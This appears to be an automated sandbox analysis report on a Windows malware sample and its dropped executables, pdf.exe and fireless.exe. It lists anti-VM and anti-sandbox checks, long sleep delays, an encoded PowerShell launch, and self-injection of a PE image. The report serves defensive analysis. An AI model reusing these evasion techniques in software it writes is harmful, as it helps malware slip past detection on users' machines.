Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: BPL_1000572_007.bat.exe, 00000000.00000002.448721724.000000000298E000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.598968323.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592125246.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592077345.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.598264553.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.590614103.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591295608.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.597986476.00000000035FF000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLLJ(REMOTETHREADSUSPENDED) [-] NTPROTECTVIRTUALMEMORY, PAGE_EXECUTE_READ: {0}ESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\USER SHELL FOLDERS/(REMOTETHREADSUSPENDED) [-] NTRESUMETHREAD: {0}
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe TID: 868 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe TID: 3028 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6128 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9552 Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: Amcache.hve.21.dr Binary or memory string: VMware
Source: BPL_1000572_007.bat.exe, 00000000.00000002.444162317.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: Amcache.hve.21.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.21.dr Binary or memory string: VMware-42 35 34 13 2a 07 0a 9c-ee 7f dd c3 60 c7 b9 af
Source: Amcache.hve.21.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.21.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen
Source: fireless.exe, 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen"select * from Win32_ComputerSystem
Source: Amcache.hve.21.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.21.dr Binary or memory string: VMware7,1
Source: Amcache.hve.21.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: BPL_1000572_007.bat.exe, 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: vmtools
Source: Amcache.hve.21.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.21.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: fireless.exe, 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual
Source: Amcache.hve.21.dr Binary or memory string: VMware, Inc.me
Source: Amcache.hve.21.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.21.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.21.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352 Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process created: Base64 decoded Start-Sleep -Seconds 50
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process created: Base64 decoded Start-Sleep -Seconds 50 Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Memory written: C:\Users\user\Desktop\BPL_1000572_007.bat.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA== Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process created: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe "C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe" Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process created: C:\Users\user\Desktop\BPL_1000572_007.bat.exe C:\Users\user\Desktop\BPL_1000572_007.bat.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352 Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Queries volume information: C:\Users\user\Desktop\BPL_1000572_007.bat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
